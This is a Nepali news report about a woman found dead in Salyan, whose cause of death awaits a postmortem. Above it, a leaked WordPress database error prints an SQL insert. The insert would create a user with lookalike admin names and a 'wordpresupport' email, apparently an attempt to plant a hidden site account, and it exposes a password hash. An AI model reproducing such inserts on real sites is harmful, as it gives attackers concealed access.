WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs52zj1FjjVb4K95eNOF0raDmGE5Nq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 19:12:27', '', 'admlnlx', 'admlnlx')
सल्यान, माघ २८ –
सल्यानमा एक महिला मृत फेला परेकी छन्। शारदा नगरपालिका वडा नं. ३ मेलघारीकी अन्दाजी ४० वर्षीया पम्फा सिंह शुक्रबार बिहान आफ्नै घरमा मृत अवस्थामा भेटिएकी हुन्। मादक पदार्थ सेवन गरेर रातभरी बाहिर नै सुतेकाले उनको के कारण मृत्यु भयो भन्ने खुल्न नसकेको जिल्ला प्रहरी कार्यालय सल्यानले जनाएको छ। प्रहरीका अनुसार शरीरमा कुनै बाहिरी चोट भेटिएको छैन। पोस्टमार्टमपछि मात्र मृत्युको कारण थाहा हुने सल्यानका प्रहरी प्रमुख श्यामबहादुर खत्रीले जानकारी दिए। सिंहको शव अहिले पोस्टमार्टमका लागि जिल्ला अस्पतालमा राखिएको छ।